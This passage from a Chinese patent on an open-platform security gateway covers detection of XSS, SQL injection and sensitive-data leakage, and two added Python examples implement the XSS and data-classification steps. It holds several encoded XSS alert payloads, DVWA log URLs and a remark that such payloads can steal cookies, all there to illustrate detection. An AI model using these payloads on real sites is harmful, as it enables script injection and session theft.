<img src="&#x6a&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x61&#x6c&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&#x3b">
In the first payload the eval() function evaluates a string and executes it as JavaScript code, so the code is equivalent to eval("alert('XSS')"); the second payload is written in decimal character references and the third in hexadecimal character references.
The first payload yields a Web log URL similar to: /dvwa/vulnerabilities/xss_r/?name=%3Cscript%3E+eval%28%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%5Cx28%5
By studying all of these attack payloads, further ways of constructing XSS attacks can be derived, such as obtaining cookies through document.cookie.
Common XSS attacks were analyzed above and the Web logs they produce were derived from them. For these XSS injection methods, step S51 may be adopted when detecting XSS injection: decode the data so that the attack payload is exposed and easier to analyze; perform lexical extraction on the decoded data to obtain HTML data and JavaScript data; perform syntax detection on the JavaScript data to obtain a detection result; and perform a semantic judgment on the syntax detection result to obtain the probability that the data is an XSS injection.
Specifically, take the following data as the input for XSS injection detection:
/post_reply.html?content=%3CIMG+SRC%3D%2F+onerror%3D%E2%80%9Calert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E%3C%2Fimg%3E
First, decode the data and strip the outer wrapping encoding so that the attack payload is exposed, which gives: <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
Then perform lexical extraction on the decoded data: analyze and extract the HTML first, then process the JavaScript. The HTML structure analysis gives:
Tag_name=IMG
Tag_value[src]=/
Tag_value[onerror]=alert(String.fromCharCode(88,83,83))
and the JavaScript lexical sequence analysis gives:
<bareword alert><leftparen><bareword String><dot>
<bareword fromCharCode><leftparen><number><comma><number>
<comma><number><rightparen><rightparen>
On the basis of the lexical analysis, the syntax is checked against the automaton defined by the JavaScript grammar specification, with the following result: the token sequence of alert(String.fromCharCode(88,83,83)) conforms to the ECMAScript 2017 standard.
Finally, on the basis of a successful syntax analysis, the hazard degree of the syntax is judged and a rating is given according to that degree, such as Normal or High Risk.
Through this detection, every HTML transmission can be found before XSS injection takes effect, so attack behaviour can be distinguished before the attack occurs and effectively intercepted.
In step S23, sensitive data refers to data whose leakage may cause serious harm to society or to individuals. It includes personal privacy data such as name, ID number, address, telephone number, bank account, e-mail address, password, medical information and educational background, as well as data that an enterprise or social organization should not publish, such as the enterprise's business situation, its network structure and its list of IP addresses.
For the detection of sensitive data leakage, step S61 may be adopted: based on natural language processing and text classification algorithms, and using artificial intelligence theory and machine learning techniques, build a classification model that can understand and identify natural language; associate documents with one or more predefined categories according to the semantic features and format of their text content; cluster and classify the key data; monitor in real time whether the data exchanged between the tested business system and the external third party contains data of the key categories; and monitor and control the circulation and use of that key data, so that the use and outgoing transfer of key data are monitored and audited and sensitive data leakage is avoided.
In practice, an Advanced Content Classification Engine (ACCE) module can monitor the data exchanged between the tested business system and the external third party for many kinds of sensitive data. The monitoring modes include keyword detection, dictionary detection and regular expression detection, and these techniques are combined flexibly for comprehensive detection according to the data type.
In step S4, the data processing service sends the corresponding intervention instruction to the gateway service according to the level of the data security problem, so as to implement data flow control and access right control on the functional interfaces of the tested service system.
Referring to fig. 3, when the data analysis service detects a data leakage problem, the data processing service issues an early warning and, according to the level of the problem, automatically issues interception, speed-limiting and circuit-breaking instructions to the gateway, intercepting subsequent requests to the designated interface or from the designated user. Besides the instructions the data processing service sends to the gateway, the early-warning information can also be verified manually by back-office staff, who then send an intervention instruction to the gateway. The supported intervention instructions are: taking an interface offline, blocking a specific user, restricting a specified IP, limiting a specified user's daily access to a specified interface, limiting a specified user's QPS on a specified interface, and erasing a specified field of a specific interface's response. Erasing the specified return field is of great value for stopping losses early when a data leak occurs and the service interface cannot be repaired in time.
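As an added example (not part of the patent), the following Python code carries the S51 pipeline through on the post_reply request above and, going a little beyond the page's single case, also on a decimal character-reference payload of the kind shown under method 6: parse_qsl and HTMLParser do the decoding and the HTML extraction, a small tokenizer produces the same token sequence as in the description, a recursive-descent check of a small expression subset stands in for the ECMAScript automaton, and the rating follows assumed weights. The sink list, the weights and the sample URLs are assumptions made here, not the patent's.

```python
# Added example (not from the patent): the step S51 pipeline, decode -> lexical
# extraction (HTML, then JavaScript) -> syntax check -> rating. The grammar is a small
# expression subset rather than the full ECMAScript automaton; the sink list and score
# weights are assumptions; the sample URLs are built from the description's own payloads.
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, quote_plus, urlsplit

# Smart quotes in captured payloads become plain quotes ("outer wrapping" removal)
_QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'"})
_SINKS = {"alert", "eval", "document", "cookie", "location", "fromCharCode"}
_TOKEN_RE = re.compile(r"""(?P<ws>\s+)|(?P<number>\d+)|(?P<string>'[^']*'|"[^"]*")
    |(?P<bareword>[A-Za-z_$][\w$]*)|(?P<leftparen>\()|(?P<rightparen>\))
    |(?P<comma>,)|(?P<dot>\.)|(?P<semicolon>;)|(?P<other>.)""", re.VERBOSE)

class _TagExtractor(HTMLParser):
    """Step 2a: record each start tag with its attributes; HTMLParser already
    decodes character references such as &#106 inside attribute values."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag.upper(), {k: (v or "") for k, v in attrs}))

def lex_js(code):
    """Step 2b: token sequence as (kind, text) pairs, whitespace dropped."""
    return [(m.lastgroup, m.group()) for m in _TOKEN_RE.finditer(code) if m.lastgroup != "ws"]

def syntax_ok(tokens):
    """Step 3: recursive descent for program := [expr] (';' [expr])* and
    expr := primary ('.' bareword | '(' args ')')*; primary is bareword/number/string."""
    kinds = [k for k, _ in tokens] + [None]  # None marks end of input
    pos = 0

    def take(kind):
        nonlocal pos
        if kinds[pos] != kind:
            raise SyntaxError(kind)
        pos += 1

    def expr():
        # a primary must come first; anything else (including end of input) is an error
        take(kinds[pos] if kinds[pos] in ("bareword", "number", "string") else "primary")
        while kinds[pos] in ("dot", "leftparen"):
            if kinds[pos] == "dot":
                take("dot")
                take("bareword")
            else:
                take("leftparen")
                if kinds[pos] != "rightparen":
                    expr()
                    while kinds[pos] == "comma":
                        take("comma")
                        expr()
                take("rightparen")

    try:
        if kinds[pos] not in (None, "semicolon"):
            expr()
        while kinds[pos] == "semicolon":
            take("semicolon")
            if kinds[pos] not in (None, "semicolon"):
                expr()
        return kinds[pos] is None
    except SyntaxError:
        return False

def analyze(raw_url):
    """Steps 1-4 for one request: one finding per HTML tag, High Risk at score >= 0.6."""
    findings = []
    for param, value in parse_qsl(urlsplit(raw_url).query, keep_blank_values=True):
        parser = _TagExtractor()
        parser.feed(value.translate(_QUOTES))  # step 1: parse_qsl already percent-decoded
        parser.close()
        for tag, attrs in parser.tags:
            f = {"param": param, "tag": tag, "attrs": attrs, "scripts": [], "rating": "Normal"}
            for attr, aval in attrs.items():
                # JavaScript the browser would run: on* handlers and javascript: URLs
                if attr.startswith("on"):
                    code = aval
                elif re.match(r"\s*javascript:", aval, re.I):
                    code = aval.split(":", 1)[1]
                else:
                    continue
                tokens = lex_js(code)
                ok = syntax_ok(tokens)
                # Step 4: valid syntax weighs 0.6 and a known sink name 0.4 (assumed weights)
                score = (0.6 if ok else 0.2) + (0.4 if any(t in _SINKS for _, t in tokens) else 0.0)
                f["scripts"].append({"attr": attr, "tokens": tokens, "syntax_ok": ok, "score": round(score, 1)})
                if score >= 0.6:
                    f["rating"] = "High Risk"
            findings.append(f)
    return findings

# Constructed samples: the description's post_reply request, the decimal
# character-reference payload of method 6, and a harmless parameter.
SAMPLE_EVENT = ("/post_reply.html?content=%3CIMG+SRC%3D%2F+onerror%3D%E2%80%9Calert%28"
                "String.fromCharCode%2888%2C83%2C83%29%29%22%3E%3C%2Fimg%3E")
SAMPLE_CHARREF = "/dvwa/vulnerabilities/xss_r/?name=" + quote_plus(
    '<img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58'
    '&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59">')
SAMPLE_BENIGN = "/post_reply.html?content=" + quote_plus("<b>hello</b> world")
```

Running analyze(SAMPLE_EVENT) yields one IMG finding whose onerror script tokenizes to the bareword/leftparen/... sequence listed in the description and is rated High Risk; the character-reference sample is decoded by HTMLParser to a javascript: URL and rated the same way, while the plain bold tag stays Normal. In the real pipeline the token sequence would be fed to a full ECMAScript grammar, and the weights would be learned rather than fixed.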
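The following added example (not the patent's or the ACCE module's own code) shows how the three detection modes of step S61 combine over one interface response and how step S4 turns the resulting level into a gateway instruction: dictionary detection on field names, keyword detection on free text, regular-expression detection on values (with a check-digit validation for the 18-digit resident ID number so that arbitrary digit runs are not flagged), and a level-to-instruction mapping. The field names, categories, weights, instruction names and the sample JSON response are all constructed for this illustration.

```python
# Added example (not from the patent): sensitive-data monitoring in the manner of
# the ACCE module (keyword, dictionary and regular-expression detection combined)
# over the JSON an interface returns, then the step S4 choice of gateway
# instruction from the problem level. Category names, weights, instruction names
# and the sample response are constructed for this demonstration.
import json
import re

# Dictionary detection: field names that by convention carry sensitive values.
SENSITIVE_FIELDS = {"id_card": "ID_NUMBER", "bank_account": "BANK_ACCOUNT",
                    "password": "PASSWORD", "phone": "PHONE", "email": "EMAIL",
                    "address": "ADDRESS"}
# Keyword detection: phrases whose presence marks a document as sensitive.
KEYWORDS = {"internal only": "CONFIDENTIAL", "network topology": "NETWORK_STRUCTURE"}
# Regular-expression detection: value formats of personal data (longest first).
PATTERNS = [("ID_NUMBER", re.compile(r"(?<!\d)\d{17}[\dXx](?!\d)")),
            ("BANK_ACCOUNT", re.compile(r"(?<!\d)\d{16,19}(?!\d)")),
            ("PHONE", re.compile(r"(?<!\d)1[3-9]\d{9}(?!\d)")),
            ("EMAIL", re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"))]
LEVEL = {"ID_NUMBER": 3, "BANK_ACCOUNT": 3, "PASSWORD": 3, "CONFIDENTIAL": 3,
         "NETWORK_STRUCTURE": 2, "PHONE": 2, "EMAIL": 1, "ADDRESS": 1}
_ID_WEIGHTS = (7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2)
_ID_CHECK = "10X98765432"


def valid_id_number(s):
    """ISO 7064 MOD 11-2 check digit of the 18-digit resident ID number, so a
    random 18-digit figure is not counted as an ID."""
    total = sum(int(c) * w for c, w in zip(s[:17], _ID_WEIGHTS))
    return _ID_CHECK[total % 11] == s[17].upper()


def _walk(obj, path=""):
    """Yield (field path, text) for every scalar in a parsed JSON document."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from _walk(v, f"{path}.{k}" if path else k)
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from _walk(v, f"{path}[{i}]")
    else:
        yield path, str(obj)


def classify(payload_text):
    """Return {category: [field paths]} for one interface response."""
    hits = {}
    for path, text in _walk(json.loads(payload_text)):
        leaf = path.rsplit(".", 1)[-1].lower()
        if leaf in SENSITIVE_FIELDS:
            hits.setdefault(SENSITIVE_FIELDS[leaf], set()).add(path)
        for phrase, cat in KEYWORDS.items():
            if phrase in text.lower():
                hits.setdefault(cat, set()).add(path)
        masked = text
        for cat, rx in PATTERNS:
            for m in list(rx.finditer(masked)):
                if cat == "ID_NUMBER" and not valid_id_number(m.group()):
                    continue
                hits.setdefault(cat, set()).add(path)
                # blank the span so a shorter pattern does not match inside it
                masked = masked[:m.start()] + "#" * len(m.group()) + masked[m.end():]
    return {cat: sorted(paths) for cat, paths in hits.items()}


def intervention(hits, interface, user):
    """Step S4: pick the gateway instruction from the highest level present."""
    level = max((LEVEL[c] for c in hits), default=0)
    order = {"interface": interface, "user": user, "level": level}
    if level >= 3:
        fields = sorted({p for c, ps in hits.items() if LEVEL[c] >= 3 for p in ps})
        return {**order, "action": "erase_fields", "fields": fields}
    if level == 2:
        return {**order, "action": "limit_qps", "qps": 1}
    if level == 1:
        return {**order, "action": "warn"}
    return {**order, "action": "none"}


# Constructed response of a hypothetical /user/profile interface.
SAMPLE_RESPONSE = json.dumps({
    "code": 0,
    "data": {"name": "Zhang San", "id_card": "110101199003071233",
             "phone": "13800138000", "email": "zhangsan@example.com",
             "order_no": "20210309000123",
             "note": "Internal only: see network topology doc"}})
```

classify(SAMPLE_RESPONSE) flags the ID number, phone, e-mail and the confidential note, and the highest level present (3) makes intervention() return an erase-fields instruction naming the two level-3 fields; the 14-digit order number is not flagged because it matches none of the value patterns. The span masking is what keeps the ID number from also counting as a bank account, a false positive a plain regex set would produce.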
Example two
Referring to fig. 4, the present embodiment provides an open platform-based security detection apparatus, including:
the interface access module 1 is used for collecting a plurality of functional interfaces of the tested service system and uniformly accessing the gateways of the open platform;
the data acquisition module 2 is used for acquiring data of each functional interface through gateway service and bypassing the acquired data to a Kafka message system; the data is data of interaction between the tested business system and an external third party;
the data analysis module 3 is used for reading data in the Kafka message system through a data analysis service to perform security detection, and sending the found data security problem to a data processing service;
and the data processing module 4 is used for sending a corresponding intervention instruction to the gateway service through the data processing service according to the level of the data security problem, so as to realize data flow control and access authority control of the functional interface of the tested business system.
The data analysis module 3 includes a first detection unit 301, a second detection unit 302, and a third detection unit 303; the first detection unit 301 is configured to detect SQL injection, the second detection unit 302 is configured to detect XSS injection, and the third detection unit 303 is configured to detect sensitive data leakage.
The functions and implementation manners of the interface access module 1, the data acquisition module 2, the data analysis module 3, and the data processing module 4 are consistent with those described in the first embodiment, and are not described herein again.
Example three
The second embodiment describes the open platform-based security detection apparatus in detail from the perspective of modular functional entities; the following describes the open platform-based security detection device in detail from the perspective of hardware processing.
Referring to fig. 5, the open platform-based security detection device 500 may vary considerably in configuration and performance, and may include one or more processors (CPUs) 510 (e.g., one or more processors), a memory 520, and one or more storage media 530 (e.g., one or more mass storage devices) storing applications 533 or data 532. The memory 520 and the storage media 530 may be transient or persistent storage. The program stored on the storage medium 530 may include one or more modules (not shown), each of which may include a series of instruction operations on the open platform-based security detection device 500.
Further, the processor 510 may be configured to communicate with the storage medium 530, and execute a series of instruction operations in the storage medium 530 on the open platform based security detection apparatus 500.
The open platform based security detection apparatus 500 may also include one or more power supplies 540, one or more wired or wireless network interfaces 550, one or more input-output interfaces 560, and/or one or more operating systems 531, such as Windows server, Vista, and the like.
Those skilled in the art will appreciate that the open platform based security detection device configuration shown in fig. 5 does not constitute a limitation of open platform based security detection devices and may include more or fewer components than shown, or some components in combination, or a different arrangement of components.
The present invention also provides a computer-readable storage medium, which may be a non-volatile computer-readable storage medium, and which may also be a volatile computer-readable storage medium. The computer-readable storage medium stores instructions that, when executed on a computer, cause the computer to perform the steps of the open platform-based security detection method in the first embodiment.
The modules in the second embodiment, if implemented in the form of software functional modules and sold or used as independent products, may be stored in a computer-readable storage medium. Based on such understanding, the technical solution of the present invention may be substantially or partially implemented in software, which is stored in a storage medium and includes instructions for causing a computer device (which may be a personal computer, a server, or a network device) to execute all or part of the steps of the method according to the embodiments of the present invention. And the aforementioned storage medium includes: a U-disk, a removable hard disk, a Read-only memory (ROM), a Random Access Memory (RAM), a magnetic disk or an optical disk, and other various media capable of storing program codes.
It can be clearly understood by those skilled in the art that, for convenience and brevity of description, the specific working processes of the above-described apparatuses and devices may refer to the corresponding processes in the foregoing method embodiments, and are not described herein again.
The embodiments of the present invention have been described in detail with reference to the accompanying drawings, but the present invention is not limited to the above embodiments. Even if various changes are made to the present invention, it is still within the scope of the present invention if they fall within the scope of the claims of the present invention and their equivalents.

Claims (10)

1. A security detection method based on an open platform, characterized in that the open platform comprises a gateway service, a Kafka message system, a data analysis service and a data processing service; the security detection method based on the open platform comprises the following steps:
collecting a plurality of functional interfaces of a tested service system, and uniformly accessing to a gateway of an open platform;
acquiring data of each functional interface through gateway service, and bypassing the acquired data to a Kafka message system; the data is data of interaction between the tested business system and an external third party;
the data analysis service reads data in the Kafka message system for security detection, and sends the found data security problem to the data processing service;
and the data processing service sends a corresponding intervention instruction to the gateway service according to the level of the data security problem, so as to realize data flow control and access right control of the functional interface of the tested service system.
2. The open platform based security detection method of claim 1, wherein the data analysis service reading data in Kafka message system for security detection further comprises:
detecting SQL injection;
detection of XSS injection;
detection of sensitive data leaks.
3. The open platform based security detection method of claim 2, wherein the detection of SQL injection further comprises:
and detecting whether the SQL injection vulnerability exists in the data, and if so, pre-compiling the data to avoid the SQL injection of the data.
4. The open platform based security detection method of claim 3, wherein the pre-compiling data further comprises:
calling the PreparedStatement class in JDBC to precompile the data and generate a compiled SQL statement; when the data is executed, the compiled SQL statement is used directly, and SQL injection is avoided.
5. The open platform based security detection method of claim 2, wherein the detection of XSS injection further comprises:
the data is decoded so that the attack payload is exposed and analysis is facilitated;
performing lexical extraction on the coded data to obtain html data and javascript data;
carrying out grammar detection on the javascript data to obtain a detection result;
and performing semantic judgment according to the grammar detection result to obtain the probability of the data being injected by XSS.
6. The open platform based security detection method of claim 2, wherein the detection of the sensitive data leakage further comprises:
based on natural language processing and text classification algorithm, adopting artificial intelligence theory and machine learning technology, constructing a classification model capable of understanding and identifying natural language, associating documents with one or more predefined categories according to semantic features and formats of text contents, clustering and classifying key data, and monitoring whether data interacted between a tested business system and an external third party contains data of the key categories in real time, so that use and outgoing of the key data are monitored and audited, and sensitive data leakage is avoided.
7. A security detection apparatus based on an open platform, characterized by comprising:
the interface access module is used for collecting a plurality of functional interfaces of the tested service system and uniformly accessing the gateways of the open platform;
the data acquisition module is used for acquiring data of each functional interface through gateway service and bypassing the acquired data to the Kafka message system; the data is data of interaction between the tested business system and an external third party;
the data analysis module is used for reading data in the Kafka message system through the data analysis service to perform security detection and sending the found data security problem to the data processing service;
and the data processing module is used for sending a corresponding intervention instruction to the gateway service through the data processing service according to the level of the data security problem, so as to realize data flow control and access authority control of the functional interface of the tested business system.
8. The open platform-based security detection apparatus of claim 7, wherein the data analysis module comprises a first detection unit, a second detection unit, and a third detection unit;
the first detection unit is used for detecting SQL injection;
the second detection unit is used for detecting XSS injection;
the third detection unit is used for detecting sensitive data leakage.
9. An open platform-based security detection device, comprising a memory and a processor, wherein the memory stores computer-readable instructions, and the processor executes the computer-readable instructions to implement the open platform-based security detection method according to any one of claims 1 to 6.
10. A computer-readable medium storing a computer program, wherein the computer program, when executed by one or more processors, implements the open platform based security detection method of any one of claims 1 to 6.
CN202110255514.1A 2021-03-09 2021-03-09 Security detection method, device, equipment and storage medium based on open platform Pending CN112861125A (en)

Publications (1)

Publication Number Publication Date
CN112861125A true CN112861125A (en) 2021-05-28

Family

ID=75994996


Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination